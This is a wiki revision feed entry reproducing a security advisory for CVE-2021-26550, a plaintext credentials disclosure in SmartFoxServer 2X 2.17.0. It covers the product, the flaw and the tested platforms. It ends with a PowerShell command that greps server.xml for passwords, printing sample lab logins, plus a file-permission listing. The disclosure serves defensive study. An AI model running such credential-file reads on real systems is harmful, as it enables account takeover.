https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-26550_SmartFoxServer_2X_2.17.0_%E6%86%91%E8%AD%89%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E 2026-04-19T13:38:03Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2021-26550_SmartFoxServer_2X_2.17.0_%E6%86%91%E8%AD%89%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E&diff=3638&oldid=prev 2021-05-30T03:04:13Z

<p>Created page with &quot;&lt;pre&gt; SmartFoxServer 2X 2.17.0 Credentials Disclosure Vendor: gotoAndPlay() Product web page: https://www.smartfoxserver.com Affected version: Server: 2.17.0...&quot;</p> <p><b>New page</b></p><div>&lt;pre&gt;<br /> SmartFoxServer 2X 2.17.0 Credentials Disclosure<br /> <br /> <br /> Vendor: gotoAndPlay()<br /> Product web page: https://www.smartfoxserver.com<br /> Affected version: Server: 2.17.0<br /> Remote Admin: 3.2.6<br /> SmartFoxServer 2X, Pro, Basic<br /> <br /> Summary: SmartFoxServer (SFS) is a comprehensive SDK for<br /> rapidly developing multiplayer games and applications<br /> with Adobe Flash/Flex/Air, Unity, HTML5, iOS, Universal<br /> Windows Platform, Android, Java, C++ and more. SmartFoxServer<br /> comes with a rich set of features, an impressive<br /> documentation set, tens of examples with their source,<br /> powerful administration tools and a very active support<br /> forum. Born in 2004, and evolving continuously since<br /> then, today SmartFoxServer is the leading middleware to<br /> create large scale multiplayer games, MMOs and virtual<br /> communities. Thanks to its simplicity of use, versatility<br /> and performance, it currently powers hundreds of projects<br /> all over the world, from small chats and turn-based games<br /> to massive virtual worlds and realtime games.<br /> <br /> Desc: The application stores sensitive information in an<br /> unencrypted XML file called /config/server.xml. A local<br /> attacker that has access to the current user session can<br /> successfully disclose plain-text credentials that can be<br /> used to bypass authentication to the affected server.<br /> <br /> Tested on: Windows (all) 64bit installer<br /> Linux/Unix 64bit installer<br /> MacOS (10.8+) 64bit installer<br /> Java 1.8.0_281<br /> Python 3.9.1<br /> Python 2.7.14<br /> <br /> <br /> Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /> <br /> <br /> Advisory ID: ZSL-2021-5627<br /> Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5627.php<br /> <br /> CVE ID: CVE-2021-26550<br /> CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-26550<br /> NIST URL: https://nvd.nist.gov/vuln/detail/CVE-2021-26550<br /> <br /> CWE ID: CWE-312<br /> CWE URL: https://cwe.mitre.org/data/definitions/312.html<br /> <br /> <br /> 29.01.2021<br /> <br /> --<br /> <br /> <br /> PS C:\Users\t00t\SmartFoxServer_2X\SFS2X\config&gt; Get-Content server.xml | Select-String -Pattern passw -Context 1,0<br /> <br /> &lt;login&gt;sfsadmin&lt;/login&gt;<br /> &gt; &lt;password&gt;Waddup&lt;/password&gt;<br /> &lt;login&gt;testingus&lt;/login&gt;<br /> &gt; &lt;password&gt;123456&lt;/password&gt;<br /> &lt;mailUser&gt;username&lt;/mailUser&gt;<br /> &gt; &lt;mailPass&gt;password&lt;/mailPass&gt;<br /> <br /> <br /> C:\Users\t00t\SmartFoxServer_2X\SFS2X\config&gt;icacls server.xml<br /> server.xml NT AUTHORITY\SYSTEM:(I)(F)<br /> BUILTIN\Administrators:(I)(F)<br /> LAB42\t00t:(I)(F)<br /> &lt;/pre&gt;</div>

Pwnwiki